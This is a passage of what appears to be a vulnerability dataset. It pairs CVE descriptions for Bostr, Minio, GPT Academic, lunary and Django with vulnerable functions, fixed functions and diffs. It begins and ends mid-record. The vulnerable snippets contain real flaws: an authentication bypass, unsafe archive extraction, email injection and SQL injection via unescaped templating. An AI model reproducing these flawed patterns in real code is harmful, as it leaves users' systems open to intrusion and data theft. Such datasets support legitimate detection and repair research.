["https://github.com/Yonle/bostr/commit/49181f4ec9ae1472c6675cab56bbc01e723855af"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_104_1", "commit": "8b131e2", "file_path": "auth.js", "start_line": 14, "end_line": 45, "snippet": "module.exports = (authKey, data, ws, req) => {\n if (!authorized_keys?.length && !Object.keys(private_keys).length && !noscraper) return; // do nothing\n if (!validateEvent(data) || !verifyEvent(data)) {\n ws.send(JSON.stringify([\"NOTICE\", \"error: invalid challenge response.\"]));\n return false;\n }\n\n if (!authorized_keys?.includes(data.pubkey) && !private_keys[data.pubkey] && !noscraper) {\n ws.send(JSON.stringify([\"OK\", data.id, false, \"unauthorized.\"]));\n return false;\n }\n\n if (data.kind != 22242) {\n ws.send(JSON.stringify([\"OK\", data.id, false, \"not kind 22242.\"]));\n return false;\n }\n\n const tags = Object.fromEntries(data.tags);\n\n if (!tags.relay?.includes(req.headers.host)) {\n ws.send(JSON.stringify([\"OK\", data.id, false, \"unmatched relay url.\"]));\n return false;\n };\n\n if (tags.challenge !== authKey) {\n ws.send(JSON.stringify([\"OK\", data.id, false, \"unmatched challenge string.\"]));\n return false;\n }\n\n ws.send(JSON.stringify([\"OK\", data.id, true, `Hello ${data.pubkey}`]));\n return true;\n}"}], "fix_func": [{"id": "fix_js_104_1", "commit": "49181f4", "file_path": "auth.js", "start_line": 14, "end_line": 47, "snippet": "module.exports = (authKey, data, ws, req) => {\n if (!authorized_keys?.length && !Object.keys(private_keys).length && !noscraper) return; // 
do nothing\n if (!validateEvent(data) || !verifyEvent(data)) {\n ws.send(JSON.stringify([\"NOTICE\", \"error: invalid challenge response.\"]));\n return false;\n }\n\n let pubkeyInConfig = authorized_keys?.includes(data.pubkey) || data.pubkey in private_keys;\n\n if (authorized_keys?.length && !pubkeyInConfig) {\n ws.send(JSON.stringify([\"OK\", data.id, false, \"unauthorized.\"]));\n return false;\n }\n\n if (data.kind != 22242) {\n ws.send(JSON.stringify([\"OK\", data.id, false, \"not kind 22242.\"]));\n return false;\n }\n\n const tags = Object.fromEntries(data.tags);\n\n if (!tags.relay?.includes(req.headers.host)) {\n ws.send(JSON.stringify([\"OK\", data.id, false, \"unmatched relay url.\"]));\n return false;\n };\n\n if (tags.challenge !== authKey) {\n ws.send(JSON.stringify([\"OK\", data.id, false, \"unmatched challenge string.\"]));\n return false;\n }\n\n ws.send(JSON.stringify([\"OK\", data.id, true, `Hello ${data.pubkey}`]));\n return true;\n}"}], "vul_patch": "--- a/auth.js\n+++ b/auth.js\n@@ -5,7 +5,9 @@\n return false;\n }\n \n- if (!authorized_keys?.includes(data.pubkey) && !private_keys[data.pubkey] && !noscraper) {\n+ let pubkeyInConfig = authorized_keys?.includes(data.pubkey) || data.pubkey in private_keys;\n+\n+ if (authorized_keys?.length && !pubkeyInConfig) {\n ws.send(JSON.stringify([\"OK\", data.id, false, \"unauthorized.\"]));\n return false;\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-27589", "cve_description": "Minio is a Multi-Cloud Object Storage framework. Starting with RELEASE.2020-12-23T02-24-12Z and prior to RELEASE.2023-03-13T19-46-17Z, a user with `consoleAdmin` permissions can potentially create a user that matches the root credential `accessKey`. Once this user is created successfully, the root credential ceases to work appropriately. The issue is patched in RELEASE.2023-03-13T19-46-17Z. 
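Note on the CVE-2024-41962 record above: the pre-fix check rejected unknown pubkeys only when noscraper was false, so setting noscraper to true silently disabled the authorized_keys allowlist. A minimal standalone Python sketch of the corrected decision logic (hypothetical helper, not the Bostr source, which is JavaScript):

def is_authorized(pubkey, authorized_keys, private_keys, noscraper):
    # Nothing configured: authentication is not enforced at all,
    # regardless of the noscraper flag.
    if not authorized_keys and not private_keys:
        return True
    in_config = pubkey in authorized_keys or pubkey in private_keys
    # An allowlist exists: membership is mandatory. noscraper is
    # deliberately not consulted here; consulting it was the bug.
    if authorized_keys and not in_config:
        return False
    return True

assert is_authorized("abc", ["abc"], {}, noscraper=True)
assert not is_authorized("evil", ["abc"], {}, noscraper=True)  # pre-fix code let this through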
There are ways to work around this via adding higher privileges to the disabled root user via `mc admin policy set`.", "cwe_info": {"CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/minio/minio", "patch_url": ["https://github.com/minio/minio/commit/c7f7e67a100ce35af559e3f49a2ed0b67deaa919"], "programing_language": "Go", "vul_func": [{"id": "vul_go_92_1", "commit": "628042e", "file_path": "cmd/admin-handlers-users.go", "start_line": "412", "end_line": "516", "snippet": "func (a adminAPIHandlers) AddUser(w http.ResponseWriter, r *http.Request) {\n\tctx := newContext(r, w, \"AddUser\")\n\n\tdefer logger.AuditLog(ctx, w, r, mustGetClaimsFromToken(r))\n\n\tvars := mux.Vars(r)\n\taccessKey := vars[\"accessKey\"]\n\n\t// Get current object layer instance.\n\tobjectAPI := newObjectLayerFn()\n\tif objectAPI == nil || globalNotificationSys == nil {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrServerNotInitialized), r.URL)\n\t\treturn\n\t}\n\n\tcred, owner, s3Err := validateAdminSignature(ctx, r, \"\")\n\tif s3Err != ErrNone {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(s3Err), r.URL)\n\t\treturn\n\t}\n\n\t// Not allowed to add a user with same access key as root credential\n\tif owner && accessKey == cred.AccessKey {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAddUserInvalidArgument), r.URL)\n\t\treturn\n\t}\n\n\tuser, exists := globalIAMSys.GetUser(ctx, accessKey)\n\tif exists && (user.Credentials.IsTemp() || user.Credentials.IsServiceAccount()) {\n\t\t// Updating STS credential is not allowed, and this API does not\n\t\t// support updating service accounts.\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAddUserInvalidArgument), r.URL)\n\t\treturn\n\t}\n\n\tif (cred.IsTemp() || cred.IsServiceAccount()) && cred.ParentUser == accessKey {\n\t\t// Incoming access key matches parent user then we should\n\t\t// reject password change requests.\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAddUserInvalidArgument), r.URL)\n\t\treturn\n\t}\n\n\t// Check if accessKey has beginning and end space characters, this only applies to new users.\n\tif !exists && hasSpaceBE(accessKey) {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAdminResourceInvalidArgument), r.URL)\n\t\treturn\n\t}\n\n\tcheckDenyOnly := false\n\tif accessKey == cred.AccessKey {\n\t\t// Check that there is no explicit deny - otherwise it's allowed\n\t\t// to change one's own password.\n\t\tcheckDenyOnly = true\n\t}\n\n\tif !globalIAMSys.IsAllowed(iampolicy.Args{\n\t\tAccountName: cred.AccessKey,\n\t\tGroups: cred.Groups,\n\t\tAction: iampolicy.CreateUserAdminAction,\n\t\tConditionValues: getConditionValues(r, \"\", cred),\n\t\tIsOwner: owner,\n\t\tClaims: cred.Claims,\n\t\tDenyOnly: checkDenyOnly,\n\t}) {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAccessDenied), r.URL)\n\t\treturn\n\t}\n\n\tif r.ContentLength > maxEConfigJSONSize || r.ContentLength == -1 {\n\t\t// More than maxConfigSize bytes were available\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAdminConfigTooLarge), r.URL)\n\t\treturn\n\t}\n\n\tpassword := cred.SecretKey\n\tconfigBytes, err := madmin.DecryptData(password, io.LimitReader(r.Body, r.ContentLength))\n\tif err != nil {\n\t\tlogger.LogIf(ctx, err)\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAdminConfigBadJSON), 
r.URL)\n\t\treturn\n\t}\n\n\tvar ureq madmin.AddOrUpdateUserReq\n\tif err = json.Unmarshal(configBytes, &ureq); err != nil {\n\t\tlogger.LogIf(ctx, err)\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAdminConfigBadJSON), r.URL)\n\t\treturn\n\t}\n\n\tupdatedAt, err := globalIAMSys.CreateUser(ctx, accessKey, ureq)\n\tif err != nil {\n\t\twriteErrorResponseJSON(ctx, w, toAdminAPIErr(ctx, err), r.URL)\n\t\treturn\n\t}\n\n\tlogger.LogIf(ctx, globalSiteReplicationSys.IAMChangeHook(ctx, madmin.SRIAMItem{\n\t\tType: madmin.SRIAMItemIAMUser,\n\t\tIAMUser: &madmin.SRIAMUser{\n\t\t\tAccessKey: accessKey,\n\t\t\tIsDeleteReq: false,\n\t\t\tUserReq: &ureq,\n\t\t},\n\t\tUpdatedAt: updatedAt,\n\t}))\n}"}], "fix_func": [{"id": "fix_go_92_1", "commit": "c7f7e67", "file_path": "cmd/admin-handlers-users.go", "start_line": "412", "end_line": "516", "snippet": "func (a adminAPIHandlers) AddUser(w http.ResponseWriter, r *http.Request) {\n\tctx := newContext(r, w, \"AddUser\")\n\n\tdefer logger.AuditLog(ctx, w, r, mustGetClaimsFromToken(r))\n\n\tvars := mux.Vars(r)\n\taccessKey := vars[\"accessKey\"]\n\n\t// Get current object layer instance.\n\tobjectAPI := newObjectLayerFn()\n\tif objectAPI == nil || globalNotificationSys == nil {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrServerNotInitialized), r.URL)\n\t\treturn\n\t}\n\n\tcred, owner, s3Err := validateAdminSignature(ctx, r, \"\")\n\tif s3Err != ErrNone {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(s3Err), r.URL)\n\t\treturn\n\t}\n\n\t// Not allowed to add a user with same access key as root credential\n\tif accessKey == globalActiveCred.AccessKey {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAddUserInvalidArgument), r.URL)\n\t\treturn\n\t}\n\n\tuser, exists := globalIAMSys.GetUser(ctx, accessKey)\n\tif exists && (user.Credentials.IsTemp() || user.Credentials.IsServiceAccount()) {\n\t\t// Updating STS credential is not allowed, and this API does not\n\t\t// support updating service accounts.\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAddUserInvalidArgument), r.URL)\n\t\treturn\n\t}\n\n\tif (cred.IsTemp() || cred.IsServiceAccount()) && cred.ParentUser == accessKey {\n\t\t// Incoming access key matches parent user then we should\n\t\t// reject password change requests.\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAddUserInvalidArgument), r.URL)\n\t\treturn\n\t}\n\n\t// Check if accessKey has beginning and end space characters, this only applies to new users.\n\tif !exists && hasSpaceBE(accessKey) {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAdminResourceInvalidArgument), r.URL)\n\t\treturn\n\t}\n\n\tcheckDenyOnly := false\n\tif accessKey == cred.AccessKey {\n\t\t// Check that there is no explicit deny - otherwise it's allowed\n\t\t// to change one's own password.\n\t\tcheckDenyOnly = true\n\t}\n\n\tif !globalIAMSys.IsAllowed(iampolicy.Args{\n\t\tAccountName: cred.AccessKey,\n\t\tGroups: cred.Groups,\n\t\tAction: iampolicy.CreateUserAdminAction,\n\t\tConditionValues: getConditionValues(r, \"\", cred),\n\t\tIsOwner: owner,\n\t\tClaims: cred.Claims,\n\t\tDenyOnly: checkDenyOnly,\n\t}) {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAccessDenied), r.URL)\n\t\treturn\n\t}\n\n\tif r.ContentLength > maxEConfigJSONSize || r.ContentLength == -1 {\n\t\t// More than maxConfigSize bytes were available\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAdminConfigTooLarge), r.URL)\n\t\treturn\n\t}\n\n\tpassword := cred.SecretKey\n\tconfigBytes, err := 
madmin.DecryptData(password, io.LimitReader(r.Body, r.ContentLength))\n\tif err != nil {\n\t\tlogger.LogIf(ctx, err)\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAdminConfigBadJSON), r.URL)\n\t\treturn\n\t}\n\n\tvar ureq madmin.AddOrUpdateUserReq\n\tif err = json.Unmarshal(configBytes, &ureq); err != nil {\n\t\tlogger.LogIf(ctx, err)\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAdminConfigBadJSON), r.URL)\n\t\treturn\n\t}\n\n\tupdatedAt, err := globalIAMSys.CreateUser(ctx, accessKey, ureq)\n\tif err != nil {\n\t\twriteErrorResponseJSON(ctx, w, toAdminAPIErr(ctx, err), r.URL)\n\t\treturn\n\t}\n\n\tlogger.LogIf(ctx, globalSiteReplicationSys.IAMChangeHook(ctx, madmin.SRIAMItem{\n\t\tType: madmin.SRIAMItemIAMUser,\n\t\tIAMUser: &madmin.SRIAMUser{\n\t\t\tAccessKey: accessKey,\n\t\t\tIsDeleteReq: false,\n\t\t\tUserReq: &ureq,\n\t\t},\n\t\tUpdatedAt: updatedAt,\n\t}))\n}"}], "vul_patch": "--- a/cmd/admin-handlers-users.go\n+++ b/cmd/admin-handlers-users.go\n@@ -20,7 +20,7 @@\n \t}\n \n \t// Not allowed to add a user with same access key as root credential\n-\tif owner && accessKey == cred.AccessKey {\n+\tif accessKey == globalActiveCred.AccessKey {\n \t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAddUserInvalidArgument), r.URL)\n \t\treturn\n \t}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-25185", "cve_description": "GPT Academic provides interactive interfaces for large language models. In 3.91 and earlier, GPT Academic does not properly account for soft links. An attacker can create a malicious file as a soft link pointing to a target file, then package this soft link file into a tar.gz file and upload it. Subsequently, when accessing the decompressed file from the server, the soft link will point to the target file on the victim server. 
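Note on the CVE-2023-27589 record above: the vulnerable guard compared the requested accessKey against the caller's credential, and only when the caller was the owner, so a consoleAdmin user could still create a user that shadows the root credential. The patch compares against the configured root credential (globalActiveCred) unconditionally. A hypothetical Python restatement of the fixed guard:

ROOT_ACCESS_KEY = "minioadmin"  # stand-in for globalActiveCred.AccessKey

def can_create_user(requested_access_key: str) -> bool:
    # Never allow an IAM user named after the root credential,
    # no matter who is asking.
    return requested_access_key != ROOT_ACCESS_KEY

assert not can_create_user("minioadmin")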
The vulnerability allows attackers to read all files on the server.", "cwe_info": {"CWE-59": {"name": "Improper Link Resolution Before File Access ('Link Following')", "description": "The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource."}}, "repo": "https://github.com/binary-husky/gpt_academic", "patch_url": ["https://github.com/binary-husky/gpt_academic/commit/5dffe8627f681d7006cebcba27def038bb691949"], "programing_language": "Python", "vul_func": [{"id": "vul_py_402_1", "commit": "2aefef26db62efd0b684f3c3f35c77432e54afff", "file_path": "shared_utils/handle_upload.py", "start_line": 91, "end_line": 157, "snippet": "def extract_archive(file_path, dest_dir):\n import zipfile\n import tarfile\n import os\n\n # Get the file extension of the input file\n file_extension = os.path.splitext(file_path)[1]\n\n # Extract the archive based on its extension\n if file_extension == \".zip\":\n with zipfile.ZipFile(file_path, \"r\") as zipobj:\n zipobj._extract_member = lambda a,b,c: zip_extract_member_new(zipobj, a,b,c) # \\u4fee\\u590d\\u4e2d\\u6587\\u4e71\\u7801\\u7684\\u95ee\\u9898\n zipobj.extractall(path=dest_dir)\n logger.info(\"Successfully extracted zip archive to {}\".format(dest_dir))\n\n elif file_extension in [\".tar\", \".gz\", \".bz2\"]:\n try:\n with tarfile.open(file_path, \"r:*\") as tarobj:\n # \\u6e05\\u7406\\u63d0\\u53d6\\u8def\\u5f84\\uff0c\\u79fb\\u9664\\u4efb\\u4f55\\u4e0d\\u5b89\\u5168\\u7684\\u5143\\u7d20\n for member in tarobj.getmembers():\n member_path = os.path.normpath(member.name)\n full_path = os.path.join(dest_dir, member_path)\n full_path = os.path.abspath(full_path)\n if member.islnk() or member.issym():\n raise Exception(f\"Attempted Symlink in {member.name}\")\n if not full_path.startswith(os.path.abspath(dest_dir) + os.sep):\n raise Exception(f\"Attempted Path Traversal in {member.name}\")\n\n tarobj.extractall(path=dest_dir)\n logger.info(\"Successfully extracted tar archive to {}\".format(dest_dir))\n except tarfile.ReadError as e:\n if file_extension == \".gz\":\n # \\u4e00\\u4e9b\\u7279\\u522b\\u5947\\u8469\\u7684\\u9879\\u76ee\\uff0c\\u662f\\u4e00\\u4e2agz\\u6587\\u4ef6\\uff0c\\u91cc\\u9762\\u4e0d\\u662ftar\\uff0c\\u53ea\\u6709\\u4e00\\u4e2atex\\u6587\\u4ef6\n import gzip\n with gzip.open(file_path, 'rb') as f_in:\n with open(os.path.join(dest_dir, 'main.tex'), 'wb') as f_out:\n f_out.write(f_in.read())\n else:\n raise e\n\n # \\u7b2c\\u4e09\\u65b9\\u5e93\\uff0c\\u9700\\u8981\\u9884\\u5148pip install rarfile\n # \\u6b64\\u5916\\uff0cWindows\\u4e0a\\u8fd8\\u9700\\u8981\\u5b89\\u88c5winrar\\u8f6f\\u4ef6\\uff0c\\u914d\\u7f6e\\u5176Path\\u73af\\u5883\\u53d8\\u91cf\\uff0c\\u5982\"C:\\Program Files\\WinRAR\"\\u624d\\u53ef\\u4ee5\n elif file_extension == \".rar\":\n try:\n import rarfile\n\n with rarfile.RarFile(file_path) as rf:\n rf.extractall(path=dest_dir)\n logger.info(\"Successfully extracted rar archive to {}\".format(dest_dir))\n except:\n logger.info(\"Rar format requires additional dependencies to install\")\n return \"\\n\\n\\u89e3\\u538b\\u5931\\u8d25! 
\\u9700\\u8981\\u5b89\\u88c5pip install rarfile\\u6765\\u89e3\\u538brar\\u6587\\u4ef6\\u3002\\u5efa\\u8bae\\uff1a\\u4f7f\\u7528zip\\u538b\\u7f29\\u683c\\u5f0f\\u3002\"\n\n # \\u7b2c\\u4e09\\u65b9\\u5e93\\uff0c\\u9700\\u8981\\u9884\\u5148pip install py7zr\n elif file_extension == \".7z\":\n try:\n import py7zr\n\n with py7zr.SevenZipFile(file_path, mode=\"r\") as f:\n f.extractall(path=dest_dir)\n logger.info(\"Successfully extracted 7z archive to {}\".format(dest_dir))\n except:\n logger.info(\"7z format requires additional dependencies to install\")\n return \"\\n\\n\\u89e3\\u538b\\u5931\\u8d25! \\u9700\\u8981\\u5b89\\u88c5pip install py7zr\\u6765\\u89e3\\u538b7z\\u6587\\u4ef6\"\n else:\n return \"\"\n return \"\""}], "fix_func": [{"id": "fix_py_402_1", "commit": "5dffe8627f681d7006cebcba27def038bb691949", "file_path": "shared_utils/handle_upload.py", "start_line": 117, "end_line": 180, "snippet": "def extract_archive(file_path, dest_dir):\n import zipfile\n import tarfile\n import os\n\n # Get the file extension of the input file\n file_extension = os.path.splitext(file_path)[1]\n\n # Extract the archive based on its extension\n if file_extension == \".zip\":\n with zipfile.ZipFile(file_path, \"r\") as zipobj:\n zipobj._extract_member = lambda a,b,c: zip_extract_member_new(zipobj, a,b,c) # \\u4fee\\u590d\\u4e2d\\u6587\\u4e71\\u7801\\u7684\\u95ee\\u9898\n zipobj.extractall(path=dest_dir)\n logger.info(\"Successfully extracted zip archive to {}\".format(dest_dir))\n\n elif file_extension in [\".tar\", \".gz\", \".bz2\"]:\n try:\n with tarfile.open(file_path, \"r:*\") as tarobj:\n # \\u6e05\\u7406\\u63d0\\u53d6\\u8def\\u5f84\\uff0c\\u79fb\\u9664\\u4efb\\u4f55\\u4e0d\\u5b89\\u5168\\u7684\\u5143\\u7d20\n for member in tarobj.getmembers():\n member_path = os.path.normpath(member.name)\n full_path = os.path.join(dest_dir, member_path)\n full_path = os.path.abspath(full_path)\n if member.islnk() or member.issym():\n raise Exception(f\"Attempted Symlink in {member.name}\")\n if not full_path.startswith(os.path.abspath(dest_dir) + os.sep):\n raise Exception(f\"Attempted Path Traversal in {member.name}\")\n\n tarobj.extractall(path=dest_dir)\n logger.info(\"Successfully extracted tar archive to {}\".format(dest_dir))\n except tarfile.ReadError as e:\n if file_extension == \".gz\":\n # \\u4e00\\u4e9b\\u7279\\u522b\\u5947\\u8469\\u7684\\u9879\\u76ee\\uff0c\\u662f\\u4e00\\u4e2agz\\u6587\\u4ef6\\uff0c\\u91cc\\u9762\\u4e0d\\u662ftar\\uff0c\\u53ea\\u6709\\u4e00\\u4e2atex\\u6587\\u4ef6\n import gzip\n with gzip.open(file_path, 'rb') as f_in:\n with open(os.path.join(dest_dir, 'main.tex'), 'wb') as f_out:\n f_out.write(f_in.read())\n else:\n raise e\n\n # \\u7b2c\\u4e09\\u65b9\\u5e93\\uff0c\\u9700\\u8981\\u9884\\u5148pip install rarfile\n # \\u6b64\\u5916\\uff0cWindows\\u4e0a\\u8fd8\\u9700\\u8981\\u5b89\\u88c5winrar\\u8f6f\\u4ef6\\uff0c\\u914d\\u7f6e\\u5176Path\\u73af\\u5883\\u53d8\\u91cf\\uff0c\\u5982\"C:\\Program Files\\WinRAR\"\\u624d\\u53ef\\u4ee5\n elif file_extension == \".rar\":\n try:\n import rarfile # \\u7528\\u6765\\u68c0\\u67e5rarfile\\u662f\\u5426\\u5b89\\u88c5\\uff0c\\u4e0d\\u8981\\u5220\\u9664\n safe_extract_rar(file_path, dest_dir)\n except:\n logger.info(\"Rar format requires additional dependencies to install\")\n return \"
\n\n
\\u89e3\\u538b\\u5931\\u8d25! \\u9700\\u8981\\u5b89\\u88c5pip install rarfile\\u6765\\u89e3\\u538brar\\u6587\\u4ef6\\u3002\\u5efa\\u8bae\\uff1a\\u4f7f\\u7528zip\\u538b\\u7f29\\u683c\\u5f0f\\u3002\"\n\n # \\u7b2c\\u4e09\\u65b9\\u5e93\\uff0c\\u9700\\u8981\\u9884\\u5148pip install py7zr\n elif file_extension == \".7z\":\n try:\n import py7zr\n\n with py7zr.SevenZipFile(file_path, mode=\"r\") as f:\n f.extractall(path=dest_dir)\n logger.info(\"Successfully extracted 7z archive to {}\".format(dest_dir))\n except:\n logger.info(\"7z format requires additional dependencies to install\")\n return \"
\n\n
\\u89e3\\u538b\\u5931\\u8d25! \\u9700\\u8981\\u5b89\\u88c5pip install py7zr\\u6765\\u89e3\\u538b7z\\u6587\\u4ef6\"\n else:\n return \"\"\n return \"\""}], "vul_patch": "--- a/shared_utils/handle_upload.py\n+++ b/shared_utils/handle_upload.py\n@@ -42,14 +42,11 @@\n # \\u6b64\\u5916\\uff0cWindows\\u4e0a\\u8fd8\\u9700\\u8981\\u5b89\\u88c5winrar\\u8f6f\\u4ef6\\uff0c\\u914d\\u7f6e\\u5176Path\\u73af\\u5883\\u53d8\\u91cf\\uff0c\\u5982\"C:\\Program Files\\WinRAR\"\\u624d\\u53ef\\u4ee5\n elif file_extension == \".rar\":\n try:\n- import rarfile\n-\n- with rarfile.RarFile(file_path) as rf:\n- rf.extractall(path=dest_dir)\n- logger.info(\"Successfully extracted rar archive to {}\".format(dest_dir))\n+ import rarfile # \\u7528\\u6765\\u68c0\\u67e5rarfile\\u662f\\u5426\\u5b89\\u88c5\\uff0c\\u4e0d\\u8981\\u5220\\u9664\n+ safe_extract_rar(file_path, dest_dir)\n except:\n logger.info(\"Rar format requires additional dependencies to install\")\n- return \"\\n\\n\\u89e3\\u538b\\u5931\\u8d25! \\u9700\\u8981\\u5b89\\u88c5pip install rarfile\\u6765\\u89e3\\u538brar\\u6587\\u4ef6\\u3002\\u5efa\\u8bae\\uff1a\\u4f7f\\u7528zip\\u538b\\u7f29\\u683c\\u5f0f\\u3002\"\n+ return \"
\n\n
\\u89e3\\u538b\\u5931\\u8d25! \\u9700\\u8981\\u5b89\\u88c5pip install rarfile\\u6765\\u89e3\\u538brar\\u6587\\u4ef6\\u3002\\u5efa\\u8bae\\uff1a\\u4f7f\\u7528zip\\u538b\\u7f29\\u683c\\u5f0f\\u3002\"\n \n # \\u7b2c\\u4e09\\u65b9\\u5e93\\uff0c\\u9700\\u8981\\u9884\\u5148pip install py7zr\n elif file_extension == \".7z\":\n@@ -61,7 +58,7 @@\n logger.info(\"Successfully extracted 7z archive to {}\".format(dest_dir))\n except:\n logger.info(\"7z format requires additional dependencies to install\")\n- return \"\\n\\n\\u89e3\\u538b\\u5931\\u8d25! \\u9700\\u8981\\u5b89\\u88c5pip install py7zr\\u6765\\u89e3\\u538b7z\\u6587\\u4ef6\"\n+ return \"
\n\n
\\u89e3\\u538b\\u5931\\u8d25! \\u9700\\u8981\\u5b89\\u88c5pip install py7zr\\u6765\\u89e3\\u538b7z\\u6587\\u4ef6\"\n else:\n return \"\"\n return \"\"\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-7472", "cve_description": "lunary-ai/lunary v1.2.26 contains an email injection vulnerability in the Send email verification API (/v1/users/send-verification) and Sign up API (/auth/signup). An unauthenticated attacker can inject data into outgoing emails by bypassing the extractFirstName function using a different whitespace character (e.g., \\xa0). This vulnerability can be exploited to conduct phishing attacks, damage the application's brand, cause legal and compliance issues, and result in financial impact due to unauthorized email usage.", "cwe_info": {"CWE-74": {"name": "Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')", "description": "The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component."}}, "repo": "https://github.com/lunary-ai/lunary", "patch_url": ["https://github.com/lunary-ai/lunary/commit/a39837d7c49936a0c435d241f37ca2ea7904d2cd"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_139_1", "commit": "35afd4439464571eb016318cd7b6f85a162225ca", "file_path": "packages/backend/src/utils/emails.ts", "start_line": 4, "end_line": 7, "snippet": "function extractFirstName(name: string) {\n if (!name) return \"there\"\n return name.split(\" \")[0]\n}"}], "fix_func": [{"id": "fix_js_139_1", "commit": "a39837d7c49936a0c435d241f37ca2ea7904d2cd", "file_path": "packages/backend/src/utils/emails.ts", "start_line": 4, "end_line": 12, "snippet": "function sanitizeName(name: string): string {\n return name.replace(/\\s+/g, \" \").trim()\n}\n\nfunction extractFirstName(name: string): string {\n if (!name) return \"there\"\n const sanitizedName = sanitizeName(name)\n return sanitizedName.split(\" \")[0]\n}"}], "vul_patch": "--- a/packages/backend/src/utils/emails.ts\n+++ b/packages/backend/src/utils/emails.ts\n@@ -1,4 +1,9 @@\n-function extractFirstName(name: string) {\n+function sanitizeName(name: string): string {\n+ return name.replace(/\\s+/g, \" \").trim()\n+}\n+\n+function extractFirstName(name: string): string {\n if (!name) return \"there\"\n- return name.split(\" \")[0]\n+ const sanitizedName = sanitizeName(name)\n+ return sanitizedName.split(\" \")[0]\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-7471", "cve_description": "Django 1.11 before 1.11.28, 2.2 before 2.2.10, and 3.0 before 3.0.3 allows SQL Injection if untrusted data is used as a StringAgg delimiter (e.g., in Django applications that offer downloads of data as a series of rows with a user-specified column delimiter). By passing a suitably crafted delimiter to a contrib.postgres.aggregates.StringAgg instance, it was possible to break escaping and inject malicious SQL.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. 
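Note on the CVE-2025-25185 record above: the project's tar branch already rejects link members and path traversal before calling extractall; the patch routes rar archives through a safe_extract_rar helper (body not shown in the record) applying the same idea. The tar-side validation, restated as a standalone sketch:

import os
import tarfile

def safe_extract_tar(tar_path: str, dest_dir: str) -> None:
    dest_root = os.path.abspath(dest_dir)
    with tarfile.open(tar_path, "r:*") as tar:
        for member in tar.getmembers():
            # A symlink or hardlink member can point anywhere on the
            # server; later reads through it leak arbitrary files.
            if member.islnk() or member.issym():
                raise ValueError(f"refusing link member: {member.name}")
            target = os.path.abspath(
                os.path.join(dest_root, os.path.normpath(member.name)))
            if not target.startswith(dest_root + os.sep):
                raise ValueError(f"refusing traversal member: {member.name}")
        tar.extractall(path=dest_dir)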
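Note on the CVE-2024-7472 record above: splitting on a plain space misses other whitespace such as \xa0, letting attacker-controlled text ride into the outgoing email greeting. A Python analogue of the patched sanitizer (the project itself is TypeScript):

import re

def extract_first_name(name: str) -> str:
    if not name:
        return "there"
    # \s in Python 3 matches Unicode whitespace, including \xa0,
    # so collapsing it first defeats the bypass.
    sanitized = re.sub(r"\s+", " ", name).strip()
    return sanitized.split(" ")[0]

assert extract_first_name("Alice\xa0injected-text") == "Alice"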
Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/django/django", "patch_url": ["https://github.com/django/django/commit/eb31d845323618d688ad429479c6dda973056136", "https://github.com/django/django/commit/001b0634cd309e372edb6d7d95d083d02b8e37bd", "https://github.com/django/django/commit/505826b469b16ab36693360da9e11fd13213421b", "https://github.com/django/django/commit/c67a368c16e4680b324b4f385398d638db4d8147"], "programing_language": "Python", "vul_func": [{"id": "vul_py_206_1", "commit": "6b178a3", "file_path": "django/contrib/postgres/aggregates/general.py", "start_line": 52, "end_line": 63, "snippet": "class StringAgg(OrderableAggMixin, Aggregate):\n function = 'STRING_AGG'\n template = \"%(function)s(%(distinct)s%(expressions)s, '%(delimiter)s'%(ordering)s)\"\n allow_distinct = True\n\n def __init__(self, expression, delimiter, **extra):\n super().__init__(expression, delimiter=delimiter, **extra)\n\n def convert_value(self, value, expression, connection):\n if not value:\n return ''\n return value"}], "fix_func": [{"id": "fix_py_206_1", "commit": "eb31d84", "file_path": "django/contrib/postgres/aggregates/general.py", "start_line": 53, "end_line": 65, "snippet": "class StringAgg(OrderableAggMixin, Aggregate):\n function = 'STRING_AGG'\n template = 